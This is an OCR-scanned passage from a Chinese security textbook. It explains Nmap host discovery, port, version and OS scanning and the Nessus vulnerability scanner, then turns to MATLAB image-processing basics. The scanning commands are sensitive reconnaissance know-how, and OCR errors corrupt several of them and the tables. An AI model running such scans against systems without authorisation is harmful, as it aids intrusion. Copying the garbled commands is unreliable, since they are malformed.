[| 


由 图 1-19 可 见 , Nmap 包含 4 项 基本 功能 : 主机 发 现 、 


端口 扫描 ,版 本 侦 测 .操作 系统 侦 测 ,这 4 项 功能 之 间 , 又 存 服务 与 版 本 侦 测 
在 大 致 的 依赖 关系 (通常 情况 下 的 顺序 关系 ,但 特殊 应 用 另 _ 
外 考虑 ) 。 首 先 需要 进行 主机 发 现 ,随后 确定 端口 状况 ,确定 上 扣 作 系统 人 
端口 上 运行 的 具体 应 用 程序 与 版 本 信息 ,最 后 可 以 进行 操作 


系统 的 侦 测 。 而 在 4 项 基本 功能 的 基础 上 ,Nmap 能 规避 防 
火 墙 与 IDS(Intrusion Detection System, 入 侵 检 测 系 统 ) ,可 
以 综合 应 用 到 4 个 基本 功能 的 各 个 阶段 。 另 外 ,Nmap 提供 
强大 的 NSE(Nmap Scripting Language) 脚 本 引擎 功能 ,脚本 可 以 对 基本 功能 进行 补充 和 
扩展 。 

3. Nmap 安装 

Nmap 可 以 安装 在 主流 操作 系统 Windows/Linux/UNIX/MacOS 上 。 在 Windows 上 
安装 后 ,形成 Zenmap 的 图 形 界面 。Zenmap 是 用 Python 语言 编写 而 成 的 开源 免费 的 图 形 
界面 , 旨 在 为 Nmap 提供 更 加 简单 的 操作 方式 。 简 单 常 用 的 操作 命令 可 以 保存 成 为 profile， 
用 户 扫 描 时 选择 profile 即 可 ,还 可 以 方便 地 比较 不 同 的 扫描 结果 ,并 提供 网 络 拓扑 结构 
(Network Topology) 的 图 形 显示 功能 。 

在 Zenmap 主 窗 口中 (图 1-20) ,Profile 栏 用 于 设置 扫描 方式 .可 以 选择 Zenmap 默认 提 
供 的 Profile 或 用 户 创建 的 Profile。Command 栏 用 于 显示 选择 Profile 对 应 的 命令 或 用 户 
自行 指定 的 命令 。 

简单 扫描 流程 可 以 直接 在 命令 文本 框 中 输入 扫描 命令 ,然后 执行 扫描 。 稍 为 复杂 一 点 
的 操作 是 : 填写 扫描 目标 一 选择 扫描 预 配置 类 型 一 根据 需要 修改 扫描 命令 一 执行 扫描 。 

二 


图 1-19 Nmap 的 主 循环 流程 


-一 TIpols Profile Help 
Target: || 扫描 目标 |-] Profie: [intense scan 预 配置 [eg] [8ean] [Cancsl 


Command: mep TAY 扫描 命令 


Nmap Output |perts fHosts |Topology | Host Details | Scans 
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扫描 结果 输出 区 域 


图 1-20 Zenmap 图 形 界面 


扫描 结果 展示 在 扫描 结果 输出 区 域 的 5 个 选项 卡 上 ,但 是 基本 上 所 有 内 容 都 体现 在 
Nmap Output 页 面 中 ,其 他 页 面 可 以 认为 是 对 此 页 面 的 可 视 化 的 解释 说 明 。 其 中 ,Ports/ 
Hosts 用 于 显示 扫描 的 端口 和 主机 ,Topology 用 于 显示 扫描 到 的 目标 机 与 本 机 之 间 的 拓扑 
结构 , Host Details 显示 扫描 主机 的 详细 信息 ,Scans 是 扫描 命令 的 详细 说 明 。 

4. Nmap 命令 行 扫描 

除 GUI 界面 外 , Nmap 还 提供 了 命令 行 界面 的 操作 方式 ,可 以 直接 在 命令 提示 符 窗口 
下 运行 Nmap 进行 扫描 。 使 用 时 须 先 进入 命令 提示 符 窗口 ,在 命令 行 输入 nmap 就 可 以 看 
到 Nmap 的 使 用 帮助 。 

命令 语法 : 

nmap [Scan Type(s)] [Options ]{target specification} 


其 中 ,Scan Type(s) 用 于 指定 扫描 类 型 ,Options 用 于 指定 选项 ,target specification 用 于 指 
定 扫描 目标 。 

除了 选项 ,所 有 出 现在 Nmap 命令 行 上 的 都 被 视 为 对 目标 主机 的 说 明 。 最 简单 的 情况 
是 指定 一 个 目标 IP 地 址 或 主机 名 。 特 别 之 处 是 ,Nmap 命令 行 可 以 接受 多 个 主机 说 明 , 而 
且 它 们 不 必 是 相同 类 型 。 例 如 : 


nmap scanme .nmap.org 192.168.1.0/8 


将 和 分 别 对 scanme. nmap. org 及 192. 168. 1. 0/8 进行 扫描 的 效果 相同 。 

5. NMAP 使 用 实例 

如 果 直 接 针 对 某 台 计算 机 的 IP 地 址 或 域名 进行 扫描 ,那么 Nmap 对 该 主机 执行 主机 发 
现 过 程 和 端口 扫描 。 该 方式 执行 迅速 ,可 以 确定 端口 的 开放 状况 。 命 令 形式 如 下 : 


nmap targethost 
该 命令 可 以 确定 目标 主机 在 线 情 况 及 端口 基本 状况 。 例 如 : 


nmap 192.168.1.10 
让 


如 果 希 望 对 某 台 主 机 进行 完整 全 面 的 扫描 ,那么 可 以 使 用 nmap 内 置 的 -A 选项 。 若 使 
用 了 该 选项 ,Nmap 对 目标 主机 进行 主机 发 现 、 端 口 扫描 、 应 用 程序 与 版 本 侦 测 、 操 作 系 统 侦 
测 及 调用 默认 NSE 脚本 扫描 。 命 令 形 式 如 下 : 


nmap -T4 -A-vV targethost 


其 中 ,-A 选项 用 于 使 用 进攻 性 (Aggressive) 方 式 扫 描 ;-T 指定 扫描 过 程 使 用 的 时 序 
(Timing) ,有 6 个 级 别 (0 一 5) ,级 别 越 高 ,扫描 速度 越 快 ,但 也 容易 被 防火 墙 或 IDS 检测 并 
屏蔽 掉 , 在 网 络 通信 状况 良好 的 情况 推荐 使 用 T4;-v 表示 显示 宛 余 (verbosity) 信 息 ,在 扫描 
过 程 中 显示 扫描 的 细节 ,从 而 了 解 当前 的 扫描 状态 。 

例如 ,全 面 扫描 192. 168. 1. 10 ,命令 如 下 : 


nmap -T4 -A-v 192.168.1.10 
该 命令 执行 时 较为 耗 时 ,但 结果 信息 量 较 多 ,全面 提 供 了 目标 机 的 信息 。 


1.3.2.1 主机 发 现 

主机 发 现 即 发 现 目标 主机 是 否 在 线 。 通 常 主机 发 现 并 不 单独 使 用 ,而 只 是 作为 端口 扫 
描 、 版 本 侦 测 .操作 系统 侦 测 的 先行 步骤。 而 在 某 些 特殊 应 用 (例如 确定 大 型 局 域 网 内 活动 
主机 的 数量 ) 中 ,可 能 会 单独 使 用 主机 发 现 功能 来 完成 。 不 管 是 作为 辅助 用 法 还 是 专门 用 
途 , 都 可 以 使 用 Nmap 提供 的 丰富 的 选项 来 定制 主机 发 现 的 探测 方式 。 

比较 常用 的 用 法 是 : -sn, 表 示 只 单独 进行 主机 发 现 过 程 ;-Pn 表示 直接 跳 过 主机 发 现 而 
进行 端口 扫描 等 高 级 操作 (如 果 已 经 确 知 目标 主机 已 经 开启 ,可 用 该 选项 ) 。 

下 面 以 探测 scanme. nmap. org 的 主机 为 例 ,演示 主机 发 现 的 用 法 。 命 令 如 下 : 


nmap -sn -PE -PS80,135 -PU53 scanme .nmap .org 
该 命令 向 scanme. nmap. org 的 IP 地 址 发 送 4 个 探测 包 : ICMP Echo、80 和 135 端口 的 
TCP SYN 包 、53 端口 的 UDP 包 (DNS domain) 。 如 果 收 到 全 部 (或 部 分 ) 回 复 ( 例 如 , 收 到 
ICMP Echo 的 回复 与 80 端口 的 回复 ) , 便 可 以 确定 scanme. nmap. org 主机 正常 在 线 。 

如 果 要 扫描 局 域 网 192. 168. 1. 100 一 192. 168. 1. 120 范围 内 哪些 IP 的 主机 是 活动 的 ， 
命令 如 下 : 


nmap -sn 192.168.1.100- 120 


1.3.2.2 端口 扫描 

端口 扫描 是 Nmap 最 基本 、 最 核心 的 功能 ,用 于 确定 目标 主机 的 TCP/UDP 端口 的 开 
放 情 况 。 默 认 情 况 下 ,Nmap 会 扫描 1000 个 最 有 可 能 开放 的 TCP 端口 。Nmap 通过 探测 将 
端口 划分 为 6 个 状态 ,如 表 1-4 所 示 。 

表 1-4 Nmap 端口 状态 
状态 说 明 

开放 的 
关闭 的 


口 


[a 

碟 
[a 

过 


端 
端口 


状 态 说 明 
filtered 端口 被 防火 墙 IDS/IPS 屏蔽 ,无 法 确定 其 状态 
unfiltered 端口 没有 被 屏蔽 ,但 是 否 开放 需要 进一步 确定 
open|filtered 端口 是 开放 的 或 被 屏蔽 
closed | filtered 端口 是 关闭 的 或 被 屏蔽 


Nmap 在 端口 扫描 方面 非常 强大 ,提供 了 十 多 种 探测 方式 。 以 扫描 局 域 网 内 192. 168. 
1. 100 主机 为 例 ,命令 如 下 : 


nmap -SS -SU-T4 -- top- ports 300 192.168.1.100 


参数 -sS 表示 使 用 TCP SYN 方式 扫描 TCP 端口 ;-sU 表示 扫描 UDP 端口 ;-T4 表示 时 
间 级 别 配置 4 级 ;--top-ports 300 表示 扫描 最 有 可 能 开放 的 300 个 端口 (TCP 和 UDP 分 别 
有 300 个 端口 )。 


1.3.2.3 版 本 侦 测 

版 本 侦 测 主要 分 为 以 下 几 个 步 又: 

首先 检查 open 与 open|filtered 状态 的 端口 是 否 在 排除 端口 列表 内 。 如 果 在 排除 列表 
内 ,将 该 端口 剔除 。 

如 果 是 TCP 端口 ,尝试 建立 TCP 连接 。 尝 试 等 待 片刻 (通常 6s 或 更 多 ,具体 时 间 可 以 
查询 文件 nmap-services-probes 中 Probe TCP NULL 对 应 的 totalwaitms) 。 通 常 在 等 待 时 
间 内 ,会 接收 到 目标 机 发 送 的 Welcome Banner 信息 。Nmap 将 接收 到 的 Banner 与 nmap- 
services-probes 中 NULL probe 中 的 签名 进行 对 比 ,查找 对 应 应 用 程序 的 名 字 与 版 本 信息 。 
如 果 通 过 Welcome Banner 无 法 确定 应 用 程序 版 本 ,那么 Nmap 再 尝试 发 送 其 他 的 探 
测 包 ( 即 从 nmap-services-probes 中 挑选 合适 的 probe) ,将 probe 得 到 的 回复 包 与 数据 库 中 
的 签名 进行 对 比 。 

如 果 反 复 探测 都 无 法 得 出 具体 应 用 ,那么 打印 出 应 用 返回 报 文 ,让 用 户 自 行进 一 步 
判定 。 
如 果 是 UDP 端口 ,那么 直接 使 用 nmap-services-probes 中 的 探测 包 进 行 探测 匹配 , 根 
据 结果 对 比分 析出 UDP 应 用 服务 类 型 。 

如 果 探 测 到 应 用 程序 是 SSL ,那么 调用 openSSL 进一步 探测 运行 在 SSL 之 上 的 具体 的 
如 果 探 测 到 应 用 程序 是 SunRPC ,那么 调用 brute-force RPC grinder 进一步 探测 具体 
服务 。 

例如 ,要 对 主机 192. 168. 1. 100 进行 版 本 侦 测 ,命令 如 下 : 


nmap - SV 192.168.1.100 


1.3.2.4 操作 系统 侦 测 
Nmap 使 用 TCP/IP 协议 栈 指纹 来 识别 不 同 的 操作 系统 和 设备 。 在 RFC 规范 中 ,有 些 
。35 。 


地 方 对 TCP/IP 的 实现 并 没有 强制 规定 ,由 此 不 同 的 TCP/IP 方案 中 可 能 都 有 自己 的 特定 
方式 。Nmap 主要 是 根据 这 些 细节 上 的 差异 来 判断 操作 系统 的 类 型 的 。 

Nmap 内 部 包含 了 2600 多 个 已 知 系统 的 指纹 特征 (在 Nmap 安装 文件 夹 下 的 nmap-os- 
db 文件 中 )。 将 此 指纹 数据 库 作为 进行 指纹 对 比 的 样本 库 。 

实现 时 ,Nmap 分 别 挑选 一 个 开放 的 和 关闭 的 端口 ,向 其 发 送 经 过 精心 设计 的 TCP/ 
UDP/ICMP 数据 包 , 根 据 返 回 的 数据 包 生 成 一 份 系统 指纹 。 

将 探测 生成 的 指纹 与 nmap-os-db 中 的 指纹 进行 对 比 ,查找 匹配 的 系统 。 如 果 无 法 匹 
配 , 以 概率 形式 列举 出 可 能 的 系统 。 

操作 系统 侦 测 的 用 法 相对 简单 ,Nmap 提供 的 命令 比较 少 。 

-0O: 指定 Nmap 进行 操作 系统 侦 测 。 

--osscanlimit: 限制 Nmap 只 对 确定 的 主机 的 进行 操作 系统 探测 (至 少 需 确 知 该 主机 
分 别 有 一 个 开放 的 和 关闭 的 端口 )。 

--osscan-guess: 大 胆 猜 测 对 方 的 主机 的 操作 系统 类 型 。 由 此 准确 性 会 下 降 不 少 ,但 会 
尽 可 能 多 地 为 用 户 提供 潜在 的 操作 系统 。 

例如 ,要 对 主机 192. 168. 1. 100 进行 操作 系统 侦 测 ,命令 如 下 : 


nmap -~-O 192.168.1.100 


指定 -O 选项 后 先进 行 主 机 发 现 与 端口 扫描 ,根据 扫描 到 的 端口 作 进 一 步 的 操作 系统 侦 
测 。 获 取 的 结果 信息 有 设备 类 型 .操作 系统 类 型 .操作 系统 的 CPE 描述 、 操 作 系统 细节 、 网 
络 距离 等 。 

除 此 以 外 ,Nmap 还 提供 了 一 些 高 级 用 法 ,如 防火 墙 /IDS 规避 ,用 于 绕 开 防火 墙 与 IDS 
(入侵 检测 系统 ) 的 检测 与 屏蔽 ,以 便 能 够 更 加 详细 地 发 现 目标 主机 的 状况 。 


1.3.3 漏洞 扫描 器 Nessus 


漏洞 扫描 工具 通过 模拟 黑客 的 行为 ,对 目标 系统 进行 攻击 测试 ,发 现 其 存在 的 安全 漏 
洞 , 生 成 评估 报告 提供 给 客户 ,并 给 出 相应 的 修补 措施 。 

Nessus 是 Tenable Network Security 公司 提供 的 远程 安全 扫描 器 ,其 第 3 版 以 前 为 开 
源 代 码 , 目 前 最 新 版 本 是 6. x, 可 运行 于 Windows 和 Linux 平台 。Nessus 对 个 人 用 户 ( 家 庭 
版 ) 是 免费 的 ,只 需要 在 官方 网 站 上 填写 邮箱 ,就 能 收 到 注册 号 ;而 对 商业 用 户 是 收费 的 。 该 
扫描 器 采用 客户 /服务 器 模式 ,服务 器 端 负责 进行 安全 检查 ,客户 端 用 来 配置 和 管理 服务 器 
端 。 服 务 器 端 使 用 插件 来 进行 安全 测试 ,每 一 项 安全 测试 都 被 写成 一 个 扩展 插件 的 形式 ,其 
所 有 插件 列表 发 布 在 http://cgi. nessus. org/plugins。 插 件 用 NASL 脚本 或 C 语言 来 编 
写 。 使 用 时 可 根据 需要 在 扫描 器 中 加 入 自己 编写 的 插件 ,Nessus 自 带 上 万 个 扫描 插件 。 
Tenable Network Security 公司 负责 维护 及 改进 Nessus 引擎 以 及 绝 大 部 分 的 插件 。 

Nessus 是 一 个 功能 强大 而 又 简单 易 用 的 网 络 安全 扫描 工具 ,对 网 络 管理 员 来 说 , 它 是 
不 可 多 得 的 审核 堵 漏 工具 ,被 誉 为 黑客 的 血 滴 子 、 网 管 的 百宝箱 。 其 官方 网 站 是 http:// 
www. nessus. org/。 

由 于 Nessus 采用 基于 插件 的 技术 ,扩展 性 强 , 支 持 在 线 升 级 ,可 以 扫描 自 定义 漏洞 或 者 
最 新 的 安全 漏洞 。Nessus 通过 插件 模拟 黑客 的 攻击 ,对 目标 主机 系统 进行 攻击 性 的 安全 漏 
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洞 扫描 ,如 测试 弱势 口令 等 , 若 模拟 攻击 成 功 , 则 表明 目标 主机 系统 存在 安全 漏洞 。 
Nessus 可 以 完成 多 项 安全 工作 ,如 扫描 选 定 范围 内 的 主机 的 端口 开放 情况 、 提 供 的 服务 、 
是 否 存在 安全 漏洞 等 等 。 它 采用 了 基于 多 种 安全 漏洞 的 扫描 ,避免 了 扫描 不 完整 的 情况 。 


1.3.3.1 Nessus 的 体系 结构 

Nessus 采用 客户 /服务 器 体系 结构 ,客户 端 提供 了 运行 在 Windows 下 的 图 形 界 面 , 也 
接受 用 户 的 命令 与 服务 器 通信 。Nessus 采用 了 一 个 共享 的 信息 接口 , 称 为 知识 库 , 其 中 保 
存 了 前 面 进行 检查 的 结果 。 检 查 的 结果 可 以 HTML、 纯 文本 、LaTeX( 一 种 文本 文件 格式 ) 
等 几 种 格式 保存 。 在 Windows 平台 上 ,客户 端 无 须 另 外 安装 软件 。Nessus 的 体系 结构 如 图 
1-21 所 示 。 
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图 1-21 Nessus 结构 


1.3.3.2 Nessus 的 扫描 过 程 

Nessus 扫描 时 ,用 户主 要 通过 Nessus 客户 端 工具 来 与 Nessus 服务 器 端 进行 交互 , 执 
行 安全 扫描 任务 。 

Nessus 将 用 户 的 扫描 请 求 传送 给 服务 器 端 ,由 服务 器 启动 扫描 并 将 扫描 结果 呈现 给 用 
户 ;扫描 代码 与 漏洞 数据 相互 独立 ,Nessus 针对 每 一 个 漏洞 有 一 个 对 应 的 插件 ,漏洞 插件 是 
用 NASL(Nessus Attack Scripting Language) 编 写 的 一 小 段 模拟 攻击 漏洞 的 代码 ,这 种 利 
用 漏洞 插件 的 扫描 技术 极 大 地 方便 了 漏洞 数据 的 维护 ,更 新 。Nessus 可 以 扫描 0 一 65535 
的 所 有 端口 ,并 以 用 户 指 定 的 格式 (ASCII 文本 .HTML 等 ) 输 出 详细 的 报告 ,包括 目标 的 脆 
弱点 、 怎 样 修补 漏洞 以 防止 黑客 人 侵 及 危险 级 别 。 

一 般 来 说 ,使 用 Nessus 进行 扫描 需要 有 如 下 几 个 步骤 : 

(1) 客户 端 界 面 ( 即 浏览 器 ) 中 填 人 需要 输入 的 服务 器 地 址 .用户 以 及 对 应 的 密码 。 

(2) 服务 器 创建 于 此 对 应 的 认证 证 书 , 并 将 认证 的 证 书 传送 给 客户 端 。 

(3) 客户 端 利 用 所 接收 到 的 认证 证 书 ,对 此 进行 相应 的 认证 。 

(4) 用 户 选 择 所 需要 的 插件 ,通过 客户 端 ,向 服务 器 发 送 对 应 的 扫描 请 求 。 

(5) 服务 器 启动 测试 ,启动 对 应 的 插件 .得 到 相应 的 扫描 结果 。 

(6) 循环 (4) 一 (5) 过 程 ,完善 扫描 结果 。 

(7) 客户 端 将 结果 进行 分 析 、 并 且 输 出 结果 。 


扫描 结束 后 ,Nessus 会 自动 弹出 扫描 结果 的 存放 路 径 , 可 以 查看 多 种 格式 的 扫描 报告 ， 


如 HTML、PDF、TXT 等 。 
Nessus 的 扫描 过 程 如 图 1-22 所 示 。 
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图 1-22 Nessus 扫描 过 程 


实际 上 ,Nessus 扫描 中 最 主要 的 部 分 是 插件 的 选 定 以 及 执行 扫描 模块 进行 扫描 ,而 具 
体 扫 描 测 试 的 内 容 和 分 析 也 是 通过 插件 完成 的 。 


1.3.3.3 Nessus 安装 

Nessus 的 官方 下 载 地 址 是 

http://www. tenable. com/products/nessus/select-your-operating-system 

Nessus 有 两 个 版 本 ,分 别 是 Home( 家 庭 版 ) 和 Professional( 专 业 版 )。 家 庭 版 是 免费 
的 ,专业 版 则 需要 付费 。 为 简单 起 见 , 可 选择 下 载 家 庭 版 。 

从 Nessus 4.2 开始 ,Nessus 服务 器 的 管理 通过 一 个 Web 接口 来 完成 ,不 再 需要 使 用 
一 个 独立 的 Nessus 客户 端 。 安 装 后 ,在 使 用 Nessus 之 前 ,必须 先 激活 该 服务 ,为 此 需要 到 
官网 获取 激活 码 , 方 法 是 在 官方 网 站 页 面 上 填写 一 个 合法 的 邮件 地 址 ,将 会 在 注册 的 邮箱 中 
收 到 一 份 关于 Nessus 的 邮件 ,在 其 中 将 会 看 到 一 串 数字 ,类 似 久 义 义 义 - 义 义 义 义 - 义 义 义 
X-XXXX, 即 激活 码 。 

在 输入 激活 码 后 ,将 开始 加 载 Nessus 中 的 插件 。 如 果 加 载 失败 ,可 进入 安装 文件 夹 ,在 

命令 行 窗口 输入 以 下 命令 : 
Pe 


nessuscli update 
启动 Nessus 服务 登录 界面 ,是 在 浏览 器 中 输入 
https:// [Server IP] :8834/ 


即 可 打开 登录 界面 (图 1-23)。 其 中 Server IP 是 指 安装 Nessus 的 服务 器 ( 即 那 台 安装 
Nessus 的 PC) 的 IP。 注 意 Nessus 服务 必须 通过 
HTTPS 连接 到 用 户 界 面 ,不 支持 不 加 密 的 
HTTP 连接 。 

1.3.3.4 Nessus 用 户 管理 


SS Nessus 


home 


用 户 管理 是 Nessus 额外 提供 的 一 种 功能 。| | 
在 一 个 大 型 企业 环境 中 或 使 用 Nessus 的 人 比较 | 古 
多 时 ,对 用 户 进行 管理 是 非常 有 用 的 。 管 理 员 可 
以 为 多 个 扫描 用 户 设置 不 同 的 安全 级 别 。 rr TE 


Nessus 提供 了 两 种 不 同 的 用 户 角色 ,分 别 是 - 
Administrator( 管 理 员 ) 和 Standard( 普 通用 户 )。 图 1-23 Nessus 登录 界面 
其 中 ,Administrator 角色 的 用 户 可 以 访问 Nessus 
中 的 所 有 功能 ;Standard 角色 的 用 户 对 部 分 功能 的 使 用 是 受 限 制 的 ,如 软件 更 新 ,用户 管 理 
及 高 级 设置 等 。 在 Nessus 的 设置 界面 选择 Accounts 选项 卡 ,可 进行 添加 /删除 用 户 操作 。 


1.3.3.5 Nessus 通信 设置 

通信 设置 指 的 是 设置 选项 中 的 Communication 选项 卡 。 在 该 选项 卡 中 包括 两 个 设置 
选项 ,分 别 是 Proxy Server 和 SMTP Server。 

Proxy( 代 理 ) 服 务 用 于 转发 HTTP 请 求 。 如 果 网 络 组 织 需 要 时 ,Nessus 将 使 用 该 设置 
实现 插件 更 新 ,并 与 远程 扫描 者 进行 通信 。 

SMTP(Simple Mail Transfer Protocol ,简单 邮件 传输 协议 ) 是 用 于 发 送 和 接收 邮件 的 
标准 。 一旦 配置 了 SMTP 服务 , Nessus 会 将 扫描 结果 通过 邮件 的 形式 发 送 到 Email 
Notifications 选项 指定 的 收 件 人 。 


1.3.3.6 Nessus 扫描 策略 

Nessus 的 策略 包括 与 漏洞 扫描 有 关 的 配置 选项 。 这 些 选 项 包括 : 控制 扫描 的 技术 方 
面 的 参数 ,包括 超时 、 主 机 数目 、 端 口 扫描 器 的 类 型 等 ;本 地 扫描 证 书 (例如 Windows、SSL)， 
认证 的 Oracle 数据 库 扫描 ,HTTP、FTP、POP、IMAP 或 者 基于 Kerberos 的 身份 验证 ;基于 
粒度 族 或 者 插件 的 扫描 说 明 ; 数 据 库 符合 策略 检查 、 服 务 检测 扫描 设置 ,UNIX 符合 检查 
等 等 。 

Nessus 是 一 个 功能 强大 而 又 简单 易 用 的 网 络 安全 扫描 工具 ,对 网 络 管理 员 来 说 , 它 是 
不 可 多 得 的 审核 堵 漏 工具 ,被 誉 为 黑客 的 血 滴 子 、 网 管 的 百宝箱 ,应 熟练 掌握 。 


1.3.4 MATLAB 图 像 处 理 


MATLAB 是 MATrix&LABoratory 两 个 词 的 组 合 , 意 为 矩阵 工厂 (矩阵 实验 室 )。 
MATLAB 是 一 种 用 于 算法 开发 .数据 可 视 化 、 数 据 分 析 以 及 数值 计算 的 高 级 技术 计算 语言 
。 39 。 


和 交互 式 环境 。 

使 用 MATLAB, 可 以 较 使 用 传统 的 编程 语言 (如 C、FORTRAN) 更 快 地 解决 技术 计算 

问题 。 MATLAB 的 应 用 范围 非常 广 ,可 以 进行 矩阵 运算 、 绘 制 函 数 和 数据 、 实 现 算法 、 创 建 
用 户 界 面 、 连 接 其 他 编程 语言 的 程序 等 ,主要 应 用 于 工程 计算 、 控 制 设计 ,信号 处 理 与 通信 、 
图 像 处 理 、 信 和 号 检测 、 金 融 建 模 设 计 与 分 析 等 领域 。 附 加 的 工具 箱 ( 单 独 提供 的 专用 
MATLAB 函数 集 ) 扩 展 了 MATLAB 环境 ,以 解决 这 些 应 用 领域 内 特定 类 型 的 问题 。 
图 像 处理 实 现 数字 水 印 的 嵌 人 和 提取 ,通常 使 用 的 工具 就 是 MATLAB, 比 使 用 C 语言 
编程 简单 得 多 。MATLAB 有 强大 的 图 像 处 理工 具 。 在 MATLAB 中 ,大 多 数 图 像 用 二 维 
数组 以 矩阵 方式 存储 ,矩阵 中 的 一 个 元 素 对 应 于 要 显示 图 像 的 一 个 像素 。 一 些 图 像 需要 用 
三 维 数组 ,如 RGB 格式 的 图 像 。 


1.3.4.1 MATLAB 图 像 的 基本 类 型 

MATLAB 中 有 3 种 基本 图 像 类 型 : 索引 图 像 .强度 图 像 ( 灰 度 图 像 ) 真 彩 图 像 (RGB 
图 像 ) 。 

1. 索引 图 像 

索引 图 像 包括 一 个 数据 矩阵 X ,一 个 颜色 映像 矩阵 map, 是 从 像素 值 到 颜色 映射 表 值 的 
直接 映射 。 像 素颜 色 由 数据 矩阵 X 作为 索引 值 , 向 矩阵 map 进行 索引 。 图 像 数字 水 印 的 程 
序 处 理 的 图 像 数据 是 二 维 信号 时 ,只 能 用 索引 图 像 作为 宿主 图 像 。 

map 是 一 个 包含 3 列 和 若干 行 的 数据 阵列 ,其 每 一 个 元 素 的 值 均 为 [1.0j 之 间 的 双 精 度 
浮 点 型 数据 。map 矩阵 的 每 一 行 分 别 为 红色 、 绿 色 、 蓝 色 的 颜色 值 。 例 如 , 值 1 指向 矩阵 
map 中 的 第 一 行 ,2 指向 第 二 行 , 以 此 类 推 。 

颜色 映射 表 通 常 和 索引 图 像 存在 一 起 。 当 调用 函数 imread 时 ,MATLAB 自动 将 颜色 
映射 表 与 图 像 同 时 加 载 。 在 MATLAB 中 可 以 选择 所 需要 的 颜色 映射 表 , 而 不 必 局 限于 使 
用 默认 的 颜色 映射 表 。 可 以 使 用 属性 CDataMapping 来 选取 其 他 的 颜色 映射 表 , 包 括 用户 
自 定 义 的 颜色 映射 表 。 

显示 一 幅 索 引 图 像 的 程序 如 下 : 


[X,map]= imread('canoe.tif'); 

image (X); colormap (map) 

2. 灰 度 图 像 

灰 度 图 像 是 一 个 数据 矩阵 I, 了 中 的 数据 均 代表 了 在 一 定 范围 内 的 颜色 灰 度 值 。 
MATLAB 把 灰 度 图 像 存 储 为 一 个 数据 矩阵 ,该 矩阵 中 的 元 素 分 别 代 表 图 像 中 的 像素 。 矩 
阵 中 的 元 素 可 以 是 双 精 度 的 浮 点 型 .8 位 或 16 位 无 符号 的 整数 类 型 。 大 多 数 情况 下 , 灰 度 
图 像 很 少 和 颜色 映射 表 一 起 保存 。 但 是 在 显示 灰 度 图 像 时 , MATLAB 仍然 在 后 台 使 用 系 
统 预 定义 的 默认 的 灰 度 颜色 映射 表 。 

要 显示 一 幅 灰 度 图 像 ,需要 调用 图 像 缩 放 函 数 imagesc。 

显示 一 幅 灰 度 图 像 的 程序 如 下 : 


I=imread('moon.tif'); 
imagesc (I, [0,1]); 
colormap (gray) 


。 40 。 


imagesc 函数 中 的 第 二 个 参数 确定 灰 度 范围 。 灰 度 范 围 中 的 第 一 个 值 ( 通 常 是 0) 对 应 
于 颜色 映射 表 中 的 第 一 个 值 ( 颜 色 ) , 灰 度 范围 中 的 第 二 个 值 ( 通 常 是 1) 对 应 于 颜色 映射 表 
中 的 最 后 一 个 值 ( 颜 色 ) 。 若 只 使 用 一 个 参数 ,可 以 用 任意 灰 度 范围 显示 图 像 。 

3. RGB 图 像 

RGB 图 像 ( 真 彩 图 像 ) 在 MATLAB 中 存储 为 数据 和 矩阵。 数组 中 的 元 素 定义 了 图 像 中 
每 一 个 像素 的 红 、 绿 、 蓝 颜色 值 。 需 要 指出 的 是 ,RGB 图 像 不 使 用 Windows 颜色 映射 表 。 
像素 的 颜色 由 保存 在 像素 位 置 上 的 红 、 绿 、 蓝 的 灰 度 值 的 组 合 来 确定 。 图 形 文件 格式 把 
RGB 图 像 存 储 为 24 位 的 图 像 , 红 、 绿 、 蓝 灰 度 值 分 别 占 8 位 ,这 样 可 以 有 一 千 万 种 颜色 。 

MATLAB 的 真 彩 图 像 数组 可 以 是 双 精 度 的 浮 点 型 数 、8 位 或 16 位 无 符号 的 整数 类 型 。 
在 真 彩 图 像 的 双 精 度 型 数组 中 ,每 一 种 颜色 用 0 和 1 之 间 的 数值 表示 。 例 如 ,颜色 值 是 (0， 
0,0) 的 像素 显示 的 是 黑色 ,颜色 值 是 (1,1,1) 的 像素 显示 的 是 白色 。 每 一 像素 的 3 个 颜色 值 
保存 在 数组 的 第 三 维 中 。 例 如 ,像素 (10,5) 的 红 、 绿 、 蓝 颜色 值 分 别 保存 在 元 素 RGB(10,5， 
1) .RGB(10,5,2) .RGB(10,5,3) 中 。 

显示 RGB 图 像 的 程序 如 下 : 


RGB= imread ('flowers .tif')7 


image (RGB) 
在 上 面 显 示 的 RGB 图 像 中 ,要 确定 像素 (12,9) 的 颜色 ,可 以 在 命令 行 中 输入 


RGB (12,9, :) 


ans(:,:,1)=59 ans(:,:,2)=55 ans(:,:,3)=91 


即 像素 (12,9) 的 RGB 颜色 为 59( 红 色 ) .55( 绿 色 ) .91( 蓝 色 ) 。 
除 以 上 3 种 图 像 类 型 ,还 有 一 种 二 值 图 像 ,与 灰 度 图 像 相同 。 
索引 图 像 和 RGB 图 像 可 以 通过 函数 转换 : 


[X, MAP]= rgb2ind (RGB) 
RGB= ind2rgb (X, MAP) 


1.3.4.2 MATLAB 的 矩阵 处 理 函 数 和 图 像 处 理 函 数 
MATLAB 有 丰富 的 矩阵 处 理 函 数 和 图 像 处 理 函 数 ,能 够 满足 各 种 图 像 处 理 的 要 求 。 
其 函数 分 别 见 表 1-5 和 表 1-6。 


表 1-5 矩阵 处 理 函 数 


矩 阵 类 型 EE 数 说 明 
zeros(n) 生成 nxn 的 全 0 矩阵 
zeros(m.n) 生成 mxXn 的 全 0 和 矩阵 
全 0 和 矩阵 
zeros(al,a2,a3,…) 生成 al Xa2X… 的 全 0 矩阵 
zeros(size( X)) 生成 与 矩阵 X 大 小 相同 的 全 0 和 矩阵 


玄 通 现 


矩阵 类 型 函 数 说 明 

ones(n) 生成 naXn 的 全 1 甜 阵 
ones(m,n) 生成 mxan 的 全 1 矩阵 

全 1 和 矩阵 
ones(al,a2,a3,…) 生成 alXa2X… 的 全 1 和 矩阵 
ones(size(X)) 生成 与 矩阵 X 大 小 相同 的 全 1 和 矩阵 
eye(n) 生成 nXn 的 单位 矩阵 
eye(myn) 生成 mxn 的 单位 矩阵 

单位 矩阵 
eye([m,n]) 生成 mXn 的 单位 矩阵 
eye(size(X)) 生成 与 矩阵 大 小 相同 的 单位 矩阵 
rand(n) 生成 nxn 的 随机 矩阵 
rand(m,n) 生成 mxn 的 随机 矩阵 

均匀 分 布 的 随机 和 矩阵 
rand(al,a2,a3,…) 生成 alXa2X… 的 随机 和 矩阵 
rand( (size(X)) 生成 与 矩阵 X 大 小 相同 的 随机 矩阵 


表 1-6 图 像 处 理 函 数 
操 作 函数 说 明 


